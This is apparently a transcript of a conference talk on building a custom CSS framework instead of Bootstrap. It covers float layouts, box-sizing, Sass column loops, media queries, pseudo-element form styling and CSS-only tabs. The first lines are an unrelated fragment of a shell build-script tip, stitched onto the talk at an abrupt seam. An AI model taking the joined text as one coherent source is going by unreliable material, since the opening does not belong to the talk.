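# In a build script you could fail when the count is non-zero:
# [ "$count" -eq 0 ] || exit 1
```

Point it at a directory with grep -r instead of a single file to sweep a whole project.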
So it doesn't necessarily mean that I want some sort of like hero image layout with three columns for the different pricing models or something for my application. Maybe an internal item of business system or something like that. It just doesn't quite need all of the stuff that Bootstrap gives you. And I'd almost argue that there are very few apps that actually would take advantage of everything that Bootstrap or any other CSS framework provides. And admittedly, that's probably not their goal. They're probably not trying to match it to your specific examples exactly. They are trying to get you most of the way there. But building your own CSS framework is a way to get you guys exactly to where you need to be. And that's not to say that we can't take some great lessons from Bootstrap, and we'll see some of the examples of that. But the goal is today, hopefully, that you'll learn that you don't necessarily have to go out and download these potentially monolithic, though they are getting smaller, slightly difficult to extend, though that's getting better as well, CSS frameworks to use in your own products. Now, if you'd like to know a little bit more about CSS frameworks in general, I gave a talk here last year on design frameworks for developers. You can watch the video up on Vimeo at this URL. And I'd love to hear your feedback on that one as well, but that's a way to kind of get a little more familiar with the landscape of design frameworks as they stood at least a year ago and which ones might be better or worse for you. So, to get started, I want to look at, in case you missed the URL, these slides are up online. There's a link at the end of the talk, so don't worry about missing some of these. But I have tried to keep the bit.ly links at least sort of consistent. So, if you do ndc-bb slash something, there's a decent chance it'll be one of the links in my talk. But you'll be able to see all of them after I put up the link to the slides later. 
So, one of the things that I noticed about Bootstrap, though, and one of the reasons why I credit it with being so widely adopted, is that it directly attacks some of the challenges that developers, and designers as well, face when working with CSS. CSS is not the most friendly language to a lot of developers. I personally consider myself fairly good at working with CSS, and even I have days where I just want to bang my head against a wall. It's not the most obvious, and it has a lot of very difficult components to it. But Bootstrap sort of fixes a lot of these, or at least abstracts them so you don't have to worry about them as much. So Bootstrap addresses each of these challenges, and we're going to look at some of them today and see if we can't find some solutions that might be a little bit easier to grok than they used to be, and maybe allow you to use some of those solutions in your own CSS frameworks. So, before I get started, I wanted to take a couple of minutes and discuss some tools that we might use to help us along the way. One of the things that has definitely changed since Bootstrap became prevalent early on is that we have a lot more tools for dealing with CSS, stuff like CSS Stats that helps you notice how many different sizes of fonts you have in your application, for example. They didn't necessarily exist back when we first started working with some of these design frameworks, and we have them now, so why not use them? Now, the first one actually has nothing to do with CSS at all, but is a general design tool that I highly recommend, and it's called Style Tiles. It's been around for a couple of years now, I think. You can see more information at styletil.es. The idea behind these is to provide kind of an abstraction of the way your application looks visually. So, think of it like a wireframe for your site's visual appearance, and what I mean by that is this example taken from the Style Tiles site.
You may notice that there are things like main headings and banners, there are colors, there's typography, there are textures, though those might be a little difficult to see on the projector, and there are also some adjectives that the author uses down here in the bottom right to describe the personality of the site. We'll revisit these a little bit later in the talk, but I wanted to point them out to begin with, because having an understanding of the visual style in your application, and how the individual components of that visual style fit together, is essential before working on any kind of CSS that actually deals with style. There are some things you can do with CSS that are a little more low-level, more to do with laying things out on the page, but very quickly I've found you end up dipping your toes into actually doing things with colors and typography and so forth, and having one of these as a reference really works well to keep some of the complexity down in your CSS. You don't even necessarily need to refer to it that often; just having it available while you're doing your CSS work is, I've personally found, very helpful. The next tool that I'd like to recommend is Sass, though you can use any CSS preprocessor. Bootstrap uses one now; in fact, they may always have. They use Less as their preprocessor, though they have a parallel line of work that's also using Sass, and I believe they have some automated system that converts from one to the other. Sass happens to be my favorite. I've personally found that it's a little bit more of a programming language than Less is. Less is a great way to add some syntactic sugar on top of CSS, but Sass gives you a lot of additional functionality on top of that still, and we'll see some of this a little bit later today. Anthony, earlier today in his talk, mentioned a couple of different ways to split some of your CSS up.
That reminded me very much of Jonathan Snook's work on the Scalable and Modular Architecture for CSS, also called SMACSS. This is an online book, and it's an e-book as well. It's relatively affordable and worth absolutely every penny; I refer to it very frequently. It's kind of his manifesto on designing good CSS: how to make it work within more complex layouts, and how to cut down on some of the maintenance problems that you might end up with later on when you're working on your projects. I don't specifically go into it today, but if you have a chance, definitely check it out. Much of the content is available on the site, so you can just read it without having to pay for the book, but the book goes into a lot more detail, and I think you get some screencasts as well on implementing it. It's a couple of years old, I believe, but absolutely worth checking out. So the next tool that I wanted to talk about is Harp.js. Who's heard of Harp, or maybe one of its competitors? Not a lot. Wow, okay. So I was contemplating doing a demo; I might actually do that. Harp is a static web server that runs from the command line, very easy to get started with, and it simply serves up assets. But it doesn't just serve up static assets like HTML or CSS; it can serve up Sass, for example, and it will convert that to CSS before it actually gets served. So let me do a real quick demo of Harp, since not a lot of people have heard of it and it's pretty awesome. I am a pretty big fan, and I'll be using it for the code for this talk as well. Okay. So let's see. Everybody see that? I can make it bigger. How's that? Everybody see that okay? I've seen some nods. Great. So Harp, as I mentioned, is a command line tool, so I can get started by just saying harp init and then giving it a name; let's just say 2014. It's going to download a little bit of default templating from the Harp site and then create a folder for us.
So we just have a layout. If you're familiar with any kind of master page scenarios, Harp uses something very similar. By default, the templates are all in Jade and Less, but it will work with Sass; I think it might even work with CoffeeScript too. But this is all we have. Now all I need to do is say harp server, and shut down my other server so I don't get an error, and we now have a local server running on port 9000. If I bring up a web browser, we now have a Harp server running. So this is a really great way to test out some of your own code. If we wanted to look at what this creates for us... I should have picked another folder. So here's our layout.jade; not much to it. There are some of the Less files in here. Now, they're not using Less for any of their default styling, but you can just start typing in Less or Sass or anything here, as long as you use the right file extensions. And if you change any of the values, you can just go back to your web browser and refresh, and everything's instantly there for you. So it's a really easy way to have a very quick feedback loop when you're testing out some of your CSS. However, Harp doesn't necessarily do a great job longer term; it is a static web server, after all. So there may be cases where you want to use something a little bit more robust. Broccoli is a great tool by Jo Liss that does just that. It's similar in functionality to Harp: it'll compile your Sass and some of your other templates and things like that, but it does it sort of inline. I don't know; there's some magic involved there, and I don't pretend to know exactly what's going on. It's a really quick way of compiling Sass and some of your other templates. So if you're using any build tools like Grunt or anything, definitely check out Broccoli. So with the tools out of the way, I want to get directly into the challenges, and there's a bit to cover today. We may not get to everything, but we'll get to as much as we can.
And the first challenge that I typically see people trying to tackle with Bootstrap is that of a general page layout. Thanks for letting me. I just realized I don't have my presenter notes anymore. Apologies. There we go. Okay. So what I normally recommend people use for that is simple CSS floats. Nobody's heard of Harp. How many people have heard of CSS floats? Decent number, hopefully. Okay, good. Do you all understand them fairly well? Maybe, okay. So to give you a brief overview, we've got a couple of divs here. They could be any other elements. And we want to put them side by side. Great. We can just add a float left to them and now their position side by side. Great. We now have a multiple column layout. And that easy. The problem is rarely do sites only have two columns and nothing else. Normally, we have something like this where we have maybe a container. We've got some other elements above and below that we also want sort of laid out in the right way. Unfortunately, when we float these, this happens. Not exactly what we're looking for. So there are a couple of solutions to this. Most of them are called clear fixes. The one that I happen to like best is just adding a CSS property of overflow hidden to the, in this case, the green container that you see here. And that will make sure that those floated elements now are used in the calculations for the height of that outer container. So you can see the blue box now appears where it's supposed to instead of being sort of pushed up to the top. And we also don't have to worry about the little green box collapsing in on itself. So if you have something like a background image, this will definitely, definitely help with that. So if we wanted to extend this out beyond just this very simple example, let me bring up one of the other demos. There we go. There's always that brief moment where everything is black and you're like, oh, please don't, don't crash on me. All right. 
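A minimal sketch of the float-and-clearfix pattern just described (the class names here are mine, not from the demo):

```css
/* Two elements floated side by side */
.column-left,
.column-right {
  float: left;
  width: 50%;
}

/* Floated children are taken out of normal flow, so without this
   the container collapses to zero height and later content slides
   up underneath. overflow: hidden is one of several "clearfix"
   techniques that force the container to contain its floats. */
.container {
  overflow: hidden;
}
```

With the overflow rule in place, anything after the container, a footer for instance, sits below the floated columns as expected.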
Here's a slightly more complex and arguably more realistic page layout. But it's actually using exactly the same techniques that we just discussed. So we have a header at the top, a navigation bar, two columns in the middle, and then a footer. So if we were to look at this, the header and navigation, all of that stuff is probably what you might expect. We're not doing anything really crazy with it. We do, however, have this class of constrained. And all that does is provide us with a fixed width. If we didn't have that fixed width and everything would sort of, well, I have some CSS transforms, which is why it's centered and that's why it collapsed. But normally it would take the full width of the page. But the same approach actually applies. If you don't specify a fixed width in some of these things, then they'll, they'll either collapse or expand, do some things you may not want. So I have this constrained class that just makes sure that everything, each one of these rows is exactly 640 pixels. But each of these items in here, we have a main section where we're fully HTML5, we're using all the new semantic elements, no divs here for the moment. And we have an article that sits to the left and then a side bar that sits to the right. Each of these is simply floated and then I have some explicit widths. If I didn't do the explicit widths, they would collapse in on themselves much like we saw the rest of the site do just moments ago. So putting these explicit widths means I now can say this side has 70% width, this side has 30% width. And then if I look at the main class, the important thing here is that we have an overflow hidden. Now if I turn this off, you'll see that what we get is the footer now collapses in on, on the bottom of those. And if I hover over the main, you'll see that it actually has no, no appreciable height. So if we had a background image or something on here, it wouldn't show up. 
So having that overflow hidden, or one of the other clearfix approaches, is a way to fix this. Now you have a very basic but still relatively common design layout for your application: a header, navigation, two columns, and then a footer. Any questions? Okay. There we go. Okay. The next challenge we'll look at is that of columns, and this is probably more common than people coming to me asking about normal page layouts. Bootstrap and many of its friends try to be fairly robust with their grid layouts. What we'll be building today isn't quite to that level, but I've found that I don't necessarily need all of the functions that Bootstrap's or its competitors' grids give me. So we'll just look at the essentials and what I need for probably 99-plus percent of my projects. What we'll be doing to fix this particular developer challenge is looking at changing the way the CSS box model works. So let me just review that real quickly. The current CSS box model goes something like this. We have a piece of content; it has a fixed width and height, for example. Then we add some padding that wraps the content. Then we add a border on top of that, which wraps the padding and the content. And then finally we have a margin on the very outside. The problem is, if you wanted to say, let's make this whole thing 500 pixels, and you apply a 500-pixel width to it, that width only applies to the content part. Which means if you have a border or padding that aren't in regular pixels, there's no easy way to figure out how wide that element's going to be. We now have some additional units of measure, like vw for viewport width and vh for viewport height. These vary depending on the size of your browser, so there's almost no way to figure out, without some JavaScript, how wide an element's going to be when you include some of those units in things like borders, for example.
So we can fix this, however. And we can do that with a trick called changing the box sizing. So now if we just set the box sizing property to border box, you'll see that what has happened is the entire thing squishes so that your content minus the margin, it's the only sticking point and we'll talk about that in a moment, is exactly the width that you want it to be. So if I said 500 pixels on this element now, it's going to take into account the width of the border and the width of the padding in addition to the width of the content itself. Now, a couple of years ago Paul Irish wrote a blog post where he recommended actually using this approach with the universal selector, little star. So every single element in your application would use this. I'm a huge fan of that. I actually do that on almost every one of the apps that I build. I didn't do that for these demos just to illustrate when it works and when it doesn't work. So if you download the code, I'm not a liar. I normally do use the universal selector for that. And it works great. It's really, really easy to be able to lay columns outside by side when you don't have to worry about things like margin and padding and border getting in the way. Now, if you'd like to know a little bit more about the box model, the video podcast A to Z CSS, which is already a fantastic video podcast if you haven't watched it. They have an episode specifically for the box model. So definitely check that out. It's only a few minutes long but really, really worth the time. So I have a brief demo about columns as well that I will bring up. There we go. There's that moment of panic again. So let me start up my real server again. There we go. So what we have here are five different sizes of columns. Arguably the first one's not really a separate size of column but nonetheless it's in there for illustrative purposes. And they're all fitting very nicely side by side. No problems at all. And I didn't have to use bootstrap. 
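The universal border-box reset mentioned above is essentially one rule; the variant below also covers pseudo-elements, which is a common extension of the original:

```css
/* Declared widths now include padding and border, so a 500px box
   is actually 500px on screen regardless of its padding or border. */
*,
*::before,
*::after {
  box-sizing: border-box;
}
```

For the talk-era browsers mentioned later, you would also add the -moz-box-sizing prefixed property for older Firefox.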
I didn't have to use anything else. But what I did use are some CSS rules that made this very easy to work with. The first one's fairly obvious: I just give it 100% width. You'll also notice that there's a little bit of space around these guys, and that's what I mentioned about the margin thing. I actually try to avoid using margins with columns, because the box-sizing change we've made doesn't account for margin. So if I put a little bit of margin on, what you may find is that your columns don't actually line up exactly. If I put two columns at 50% width with no margin, great, they'll fit next to each other, no problem. But if I put some margin on there, one of them will wrap, because the margin widths aren't included in the calculations for the width. So I keep margins out of it. What you can do instead is put an inner element and add some margin on the inner element, or, as I've done here, add some padding on the outer element. So if I make this larger, you'll see that we just get a little bit more padding between our columns. Sometimes people call the space between two columns gutters. I believe it's actually called alleyways if you've worked with any kind of print layout or print typography, though normally people look at me strangely and act like I'm some sort of column hipster if I call them alleyways, so gutter works just fine. But what we've done is add a little bit bigger of a gutter just by adding some additional padding on those columns. So let's take a look at some of the code that makes this work. This is some of the code that will be shared later, so don't worry if you don't feel like writing it down right now. What we have is a universal selector inside this particular part of the app, and I've simply applied the border-box sizing to everything within this part.
This is one of the cool features of Sass, by the way: the ability to nest CSS selectors. We'll see a couple more examples of how Sass can help us in just a moment. What we have is our columns, in general, floated to the left so that everything lines up just right, and then we've added our padding here; if we wanted to change the gutter, we certainly could. And then I've got a couple of rules that specify widths. One of them is going to be our sort of full column, if you will, at 100% width. Because these things are floated, if I don't provide 100% width, as I mentioned earlier, they'll collapse on themselves when the width isn't specified, so I always have at least something that's a full-width column. And then I've got a couple of other columns that are just broken up by percentages, and if you make sure that your percentages in some form or fashion add up to 100%, then you're good. The only difficult part is if you've got columns that are, say, 33 and a third percent: it's hard to carry the threes out to enough decimal places. Someone once told me that browsers only respect three decimal places for values like this. I don't know if that's true or not, but it at least works well in my experience, so I try to keep those odd roundings to a minimum. What you could do, if you wanted thirds or something, is just make two of them 33% and the last one 34%. This works well for me, though; you can see everything lines up very nicely. The green ones are the ones that are 33% wide, these blue ones are 25%, and finally the purple ones are 20%. Now, just because we have all of these arranged like this doesn't mean they have to be. If I wanted to drag one of these 25% ones, for example, up next to this 50% one, and then grab another one, you can see that we can still compose our layouts in whatever flexible manner we might want to.
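Reconstructed from the demo's description, the column rules look roughly like this (the class names and gutter size are assumptions on my part); note the Sass nesting, which compiles out to plain descendant selectors:

```scss
.columns {
  // Border-box sizing keeps the percentage widths honest even
  // though each column carries padding for its gutter.
  * {
    box-sizing: border-box;
  }

  .column {
    float: left;
    padding: 0 0.5em; // the gutter (or "alleyway")
  }

  // Widths chosen so each row can sum to 100%.
  .column-full    { width: 100%; }
  .column-half    { width: 50%; }
  .column-third   { width: 33.333%; }
  .column-quarter { width: 25%; }
  .column-fifth   { width: 20%; }
}
```

Because margins are avoided and padding is inside the border-box width, any mix of these classes that sums to 100% sits on one line.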
And I haven't actually added or removed any rows, which, the last time I worked with Bootstrap, there were a lot of rows involved in some of these things. I don't have any rows here. All of this is just within one section, and we've used the browser's own native ability to flow things from one line to the next when they're floated to take advantage of our column layouts. So I have a 50% column next to 25% columns; no additional work required. If I wanted to have a number of these different widths, I could certainly do that as well. And that's actually all the code that we needed to make this happen. Everything else in these options that we've imported at the top is for visual appearance, the colors and typography and such, but the column information itself is just what you see right here. It's fairly straightforward, and as long as you're not targeting really antiquated browsers, everything here should work just fine. I think IE7 has some problems with box-sizing, and if memory serves, Firefox requires a vendor prefix for it, but all of the modern browsers work just fine. Ironically, the very old versions of Internet Explorer actually had this type of box-sizing model, and then Microsoft changed it, probably because they were getting heat for it just like everything else. But actually, even back then, I believe that IE had it right; they got the box model right to begin with, and this is kind of your IE reset. So if you want to give Microsoft any cred for CSS, go ahead and give them some for this, because it really is a superior way of representing the box model. All right. If you'd like to learn a little bit more about columns, not only in CSS but just in general, there are a couple of links that I've provided here. Again, the slides will be available, and there's a link at the end of the talk, so don't worry about taking pictures; there's some good information there.
Unfortunately, one of the problems that we sometimes get into with this is that we might have a layout of our CSS that goes something like this, where in this case I only have nine directives for column widths. But what if you have a layout with seven, or 20, or however many columns you might want? You might end up with a lot of different CSS selectors, and you might end up doing a lot of math. Fortunately, we can actually use some of the built-in features of Sass, or Less, or one of your other CSS preprocessors of choice, to cut down on this. Here's what I mean. This is what we had before, and we can simplify it to this. Now, let me walk through this real quick. Oops. That's not what I wanted to do. Ah, laser pointer. Awesome. So the first thing that we do is define the number of columns that we want in this particular layout. This also means that if you wanted to change the number of columns away from what one of the CSS framework standards gives you, you can easily do that. Say you wanted a five-column layout: no problem, it's in a Sass variable, and by changing it, we now get a different number of iterations through this loop. Now, I won't go into too many details about how the loop works; if you're familiar with loops in any other programming language, they work very similarly. We have a loop, we have an index variable here, and then we're going from the number one through the number of columns minus one. The only reason for the minus one is so that we don't generate the 100% width, but if you do want the 100% width, you could just say from one through $columns and get the full number. And then what we're doing is creating a CSS class that has that variable interpolated into it, so we'll get column-1, column-2, column-3, and so forth. And then we have some simple math that says take the full width of the page, or whatever it might be, 100%.
Divide it by the number of columns, multiply that by the span that we want, and that gives us the value. So if we wanted something that spanned five columns in a ten-column layout: 100% divided by ten, times five, is 50%. Now, if you want to play around with this a little bit more, there's a tool that I recommend called SassMeister, and I actually already have a lot of this in place. You can see you put in some Sass on the left, and it gives you the output CSS on the right. So if we wanted to see what this might look like with seven columns, we can just do that, and a few seconds later we're given the exact numbers. And you can see from the decimals that seven columns might not be exactly what you want to do. But if you wanted to do something like 14 columns, which probably isn't any better than seven now that I think about it, 16 columns is much better. You get some fairly standard numbers, and I've now changed the number of columns that I'm using in my site just by changing one variable in Sass. Really easy to work with. And then, as I mentioned earlier, both Broccoli and Harp and many other tools will do this sort of compilation for you. But SassMeister is a nice little playground on the Internet, so if you want to make sure you have your syntax right, or maybe you just want to do this once and copy and paste the output CSS from the right side, you don't have to worry about it anymore. Okay. If you'd like to know more about some of the other Sass functions, there's a link here, ndc-bb-sass. There's a lot to Sass, and there are even a number of frameworks built on top of it, not necessarily CSS frameworks, but frameworks that extend the API of Sass and give you even more functionality. So the next challenge that we want to talk about is that of multiple screens. Responsive design is really big right now.
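Reconstructed from the walkthrough above, the loop looks something like this (the exact variable and class names are my guesses from the slide):

```scss
$columns: 10;

// Generates .column-1 through .column-9; loop "through $columns"
// instead if you also want an explicit 100% class.
@for $i from 1 through $columns - 1 {
  .column-#{$i} {
    // 100% divided by the column count, times the span.
    // (Talk-era syntax; newer Dart Sass prefers math.div over "/".)
    width: 100% / $columns * $i;
  }
}
```

Changing $columns to 5 or 16 regenerates the whole grid, which is the point: one variable instead of a hand-maintained list of width rules.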
What if I want something that looks just as good on my phone as it might on one of these larger screens or even a huge screen like this? What do we do? So we can use the concept of media queries in our CSS, and if you were paying attention earlier, you might have noticed I sort of scooted some media queries down off the page so you wouldn't look at them. But media queries are the ideal way of dealing with multiple screens. So the syntax is relatively straightforward. We simply use an @media directive, and we provide some sort of CSS property that lets us determine, it's basically a Boolean test, is this true or not. And if it is true, then everything that you see in this block here, all the CSS styles, will be applied to your page. So let's see what that looks like. I'm actually going to refresh this because these grids are already responsive, and we can demo that. If I drag this over, you'll see the columns will start to squish. And then once I reach 360 pixels, watch the blue ones because they will now sort of restructure, and they are now in a completely different configuration than we had before. So there's two things at work here. One is actually some rules that I applied to the section element. This is the other way, the non-media-query way, if you will, of applying responsive design. That is to use minimum and maximum widths, and then use a width of 100%. So these minimum and max widths are going to clamp both sides of the size of this thing, and then width 100% means between those two values, use up as much space as you can. So it will never be more than 640 pixels wide, and it will never be less than 128 pixels wide, but anything in between it's going to stretch or squish to accommodate however much space might be available. However, we also need to address the problem of what happens if things get too small, and that's where our media queries come in. So let me scroll down to this secret part down at the bottom. 
So as we saw in the slide, all we need is an @media directive, and then some CSS selectors, in this case, it's saying if the width of the site is less than or equal to 360 pixels. So if its maximum width is 360 pixels, then apply these additional CSS properties. In this case, I wanted to change the size of the four columns so that each one would actually be 50% instead of simply 25%. Now, any CSS things will work in here, so you don't necessarily have to stick to just things like widths. But I have found that things like changing colors based on different sizes of devices may not be the most ideal scenario, but I don't want to be a designer for you, so if that works out for you, great, have at it. Those two approaches are really all you need to do some very basic but fairly powerful responsive design with things like column layouts. Again, nice and fluid, and it works very well. And one other thing I wanted to point out, if you're a Chrome user, and if you'd like to do some of this stuff, I would suggest at least checking it out if you haven't already. Chrome now has a new emulation tab down here by the console that allows you to emulate the screen sizes of particular devices. So I can even say, let me see what this looks like as an iPhone 4, and I may have to refresh the page for it to work. I've probably done something else wonky. Well, regardless, when this normally works, you'll actually see that it has reduced the size of my viewport to that of the iPhone 4 or any of the other devices. And my cursor has also changed to this little circle thing, and that is the Chrome option of emulating touch events. So when I click, the browser is actually not going to get a click event, it's now going to get a touch start and touch end event. So if you're doing any kind of responsive development, check this out. Obviously not if you're trying to do some demos for something like this, because that may not work out well. Okay. 
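Put together, the two techniques just described look roughly like this. The element and class names, the 360-pixel breakpoint, and the width values come from the demo as described, so treat them as assumptions:

```scss
// Fluid clamping: stretch to fill the available space, but never wider
// than 640px and never narrower than 128px.
section {
  width: 100%;
  min-width: 128px;
  max-width: 640px;
}

// Below 360px, restructure: each of the four 25% columns becomes 50%
// wide, so they wrap into two rows of two.
@media (max-width: 360px) {
  section .column {
    width: 50%;
  }
}
```

The min/max clamp handles the comfortable range on its own; the media query only kicks in for the "too small" case.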
Turn off this. Okay. So the last challenge we're going to look at is laying out forms on a page. I mentioned earlier most of my time is spent doing business applications. Your mileage may vary on that, but assuming you're doing something similar, you've probably run into the problems of dealing with form inputs. Browsers and different operating systems like to render these slightly differently. So how can you resolve that? So we're going to use a concept called pseudo-elements. And this is an interesting way to inject additional elements into your page that may not necessarily be represented in HTML, but they're still attached to regular elements. So let me show you what I mean. Let's assume that we've got a simple radio button, and maybe we don't like the default style, so we want to do something a little bit different with it. So the first thing that we're going to do is hide it completely. This may seem a little unintuitive. How can someone interact with it if it's completely hidden? But by using visibility as hidden, we can still click on it. It still becomes a clickable element. If we use display none, it would collapse up into a zero by zero pixel size, if you will, and nobody could click on it anymore. But by doing visibility hidden, the element still takes up space on the page, and it can receive click events, so you can turn it on and off if it's a check box or select between options if it's a radio. Now I'm going to use a pseudo-selector, a pseudo-element. In this case, it's before. There's before and after, and we'll see after in just a moment. But this gives you a brand new element to style and work with as you please. So what I've done here is created a new element, given it a display block so it takes up a fixed portion of the page, and I can style it with width and height. I've given it a width and height, made it green, and probably have given it a little bit of a border radius so it has a nice round appearance. 
Now you'll notice that the other element is still there. It's represented by the dotted purple lines behind it. But what we've done is replaced it with our new element that we can style just like it's any other div. So if you don't like the normal appearance of some of the check boxes and radio buttons and so forth, you can use this approach to sort of sweep those under the covers and replace it with a visual style that you prefer. Now I'm going to sort of combine some pseudo-selectors here. So bear with me. The checked option is available for check boxes and radio buttons and indicates what happens or how the element appears when whatever option it is is selected. So if the check box has a check in it or if the radio button is selected itself. So what I've done is simply added a little text check mark that you can get from somewhere in the Unicode character sheet. I could also have put some additional styling or something like that. It's not limited to just putting characters in there. Now I have my own custom-styled check box or radio button. And I didn't really have to do a ton of work with it. So let's see what this code looks like. I feel like it's getting longer every time. Is it just me? Okay. So here we have a couple of examples of what we're using with pseudo-elements and then a little bonus example with select boxes as well. So what we've got are, let me close down this. We have a simple check box here that I've styled to use a square instead of the normal OS X default. And we've got a couple of radio buttons here that I've used a similar visual treatment to. So if I expand this and actually look at what this guy looks like, we have a standard check box and we've set its visibility to hidden. So it's still there. It may be a little difficult to see, but we actually do have a little blue box representing the part of that element that's actually there. It's still on the page. We haven't completely removed it. 
And then if you expand this, and this is an option in Chrome, but I believe many of the other browsers have this as well, you can see the little pseudo-selectors that we've actually added to this. And if I click on it, you can see the styles that are associated. So what I've done is set a border on it. I have a background color, a specific width and height, normal CSS properties. I could do whatever I wanted to. If I wanted to put a CSS3 transform, so it's doing some sort of 3D spin effect, I could do that as well. Probably not the best idea, but it is possible. This is just a regular element that you can style. The only requirement is to provide this content property. Now, the content property is sort of just what it kind of sounds like. Elements have content within them. Normally, it's something like text. So in this case, I have to at least put an empty string in there, but I could put other content if I wanted to. And you can see it actually shows up on the page here. By the way, if you're doing any sort of form layouts and want to put colons on your labels, instead of remembering to put colons on all your labels, you can use an after pseudo-element and add the content as just a colon. And then whatever the label text is, you'll get a colon on the end. So this is just regular text. I just happen to be using it as blank so that nothing shows up, but it is required for before and after pseudo-selectors. And then the after pseudo-selector, very similar. I'm just styling a little black box. I could change it to whatever color I wanted to, and you'll see that it shows up maybe a little bit more visually appealing depending on your persuasions than the black is. But nonetheless, regular CSS element, we can style it however we might want to. Now, our check boxes are very similar. I have radio buttons, I should say. We have a typical radio, and I've got a before selector on it. And you can see when I select this one, we now have this after selector. 
And that's by virtue of the fact that we're using this combined :checked selector as well as the after. So we've completely replaced the default view that the browser gives us of each of these input elements with our own custom styling. And the last one I'll mention is the drop down list. This, I believe, is still a little bit tricky in some versions of Windows and Internet Explorer, but at least for most of the modern browsers, you can actually style it directly if you don't like the default styles. So I've just killed all of the normal appearance with -webkit-appearance: none. There are similar techniques in Firefox and IE, but it still behaves just like a regular selection box. I can choose different options here and they show up. But I've chosen a different typeface, some background colors, borders, things of that nature. Really easy to lay all of these form items out. And because you now have complete control over their width and height, it's a lot easier to put those in the normal flow of a document. One of the problems that I had first getting started with HTML is things like radio buttons wouldn't necessarily be the same height as the labels for the radio buttons. This is an easy way to get around that because you can explicitly set widths and heights and other layout properties for all of your form elements. Oops, somebody's got an AirPlay display in here. Maybe after this I'll hijack their display and we'll see what happens. Okay, any questions on the challenges that we've seen so far before we move on? Which is really just an excuse for me to get some more water. Okay. Yes? No, that's part of Sass, and many other CSS preprocessors will have that. There are a number of different functions that are provided by those tools, but the for loop is one that's just in Sass right now. The variables are, however, coming to CSS. 
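A minimal sketch of the checkbox technique walked through above: hide the native control with `visibility` (so it still takes up space and receives clicks), draw a replacement box with a `::before` pseudo-element, and swap in a check mark on `:checked`. The sizes and colors are assumptions, and pseudo-element support on form inputs varies by browser, so this follows the Chrome demo described here:

```scss
input[type="checkbox"] {
  // Hidden but still clickable — display: none would collapse it
  // to zero size and it could no longer be toggled.
  visibility: hidden;

  &::before {
    content: "";          // required for any before/after pseudo-element
    visibility: visible;  // re-show the pseudo-element itself
    display: block;
    width: 16px;
    height: 16px;
    border: 1px solid #333;
    border-radius: 8px;   // the nice round appearance
    background: #7a9f35;  // the green box from the demo (assumed value)
  }

  // A text check mark (U+2713) when the box is selected.
  &:checked::before {
    content: "\2713";
    text-align: center;
    line-height: 16px;
  }
}

// The select-box reset mentioned at the end; similar properties
// exist for other engines.
select {
  -webkit-appearance: none;
}
```

The same pattern works for radio buttons, just swapping the `[type="checkbox"]` selector and the checked-state styling.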
I don't know if it's the same syntax, but future versions of CSS will have abilities to assign variables and stuff like that, but the for loop is definitely a Sass convention. Great question. Okay. One of the other things that Bootstrap provides in addition to just regular CSS layouts is a little bit of behavior too. I mean, there's tabs, there's all sorts of things like that. It's not just columns and different page layouts and so forth. So I wanted to take a few moments and talk about how we can still bring some of those things in without having to rely very heavily on Bootstrap. Now, I will say this is where I typically will diverge from the write it yourself approach. I don't want to build date pickers. I don't want to build tab strips. A lot of that stuff is just, it's more JavaScript than I like to look at. I like to focus on building features with JavaScript. Fortunately, there are some other companies that are more than happy to take your money in exchange for giving you some of these things. One of those is Kendo UI, though I have to say they just did something absolutely fantastic. They have open sourced a number of their controls and I believe the vast majority of them are available for free. And I think they're making their money off of some support agreements or something. So if you haven't tried Kendo maybe because of its price, now is a great time. But ultimately the Kendo UI suite is a set of some of these controls. So date pickers, modal windows, tab strips, all the sorts of things that you'd expect from Bootstrap. There's actually even quite a few more as well. And if you're really interested, Kendo has its own mobile application development framework that you can build an entire mobile app just with Kendo. Pretty amazing series of tools, and it'll definitely handle a lot of the common cases for things like I mentioned the modal windows and stuff like that for you. 
Things that Bootstrap also provides, but since we kind of have gotten rid of Bootstrap so far, or its competitors, we don't want to leave you guys hanging without any kind of behavior to your site. But having said that, you don't always need a lot of JavaScript for that. One of the things that Jonathan Snook actually taught me many years ago at one of his workshops is this concept of stateful CSS, where you can actually use CSS classes to modify the state of your application. So instead of using a JavaScript control for tabs, you can actually do that in CSS only. If you'd like to know more, I have a blog series about this and have a few examples of how to do this, but it's ultimately using some CSS and a very, very minimal, if not no, JavaScript to replicate some of the same features that you might expect from a JavaScript app. In fact, let me bring one up for you now as a quick example. So this is a tab control, so here's our HTML. This is, I think this is also one of the links that's available later, so don't necessarily worry about writing down URLs or anything, but we actually have the ability to switch between three different pieces of content and this is entirely CSS. There's no JavaScript in here at all, and yet we effectively have a little tab strip. So it's a little bit faster because it's all CSS, none of it's JavaScript, and you don't even need to look at something like Kendo, much less Bootstrap, if you want something as simple as a tab control. And I can't see my title bar. There it is. Okay. Now one of the futures of where the web is heading is with this concept of web components. Web components are basically just groups, fragments of HTML and CSS and some JavaScript that you can sort of put together and apply in different places on a site. It's kind of an abstraction for common interface elements. So you might put a tab strip in one of those. You might put your own custom date picker or even a list of objects. 
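One common way to build the kind of CSS-only tabs described above is the radio-button technique: hidden radio inputs hold the state, their labels act as the tab headers, and `:checked` decides which panel shows, with no JavaScript at all. The markup in the comment and the class names are assumptions, not the exact demo code:

```scss
// Assumed markup, one trio per tab:
//   <input type="radio" name="tabs" id="tab-1" checked>
//   <label for="tab-1">Tab 1</label>
//   <div class="panel">First tab's content</div>

input[name="tabs"] {
  display: none; // the labels are the visible, clickable tab headers
}

.panel {
  display: none; // all panels hidden by default
}

// Show only the panel that follows the checked radio's label.
input[name="tabs"]:checked + label + .panel {
  display: block;
}
```

Because the radios share a `name`, the browser's own single-selection behavior does the state management the JavaScript would otherwise do.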
Bootstrap provides these to an extent, but Bootstrap's examples of these components are really just kind of pre-made HTML fragments that you have to copy and paste yourself. The CSS selector example that we saw at the very beginning is an example of one of these components where they just have some CSS that's very tightly coupled to the HTML implementation. And that's kind of their idea of components. But the Polymer project by Google is one attempt at bringing web components into what we can use now, because web components are a future spec. They're not out there just yet. So the idea behind it is to take some HTML that looks something like this. So we've got a modal and maybe some header text and some content to it. If you have a lot of modals in your application, you probably have this code duplicated in a lot of different places. And Polymer allows you to abstract that duplication and make something that looks an awful lot like this. So you're effectively creating new HTML elements and you can have attributes on them. You can have content on them. And then when they're rendered to the browser, it's actually split back up into its component HTML. Now, if you happen to be using Ember, Ember actually designed its components very, very closely with the web component spec. I'm not an Angular user, so I can't speak to that. But if you have some experience, I'd love to hear about it. But it does very much the same thing. In fact, really the only difference is Ember uses the Handlebars templating language. So there's curly braces instead of angled brackets. But the code is exactly identical between this and what Polymer allows you to use. Oh, I also use single quotes because I'm a JavaScript hipster, so I have to use single quotes. But you know, these web components are definitely coming down. They're a great way of 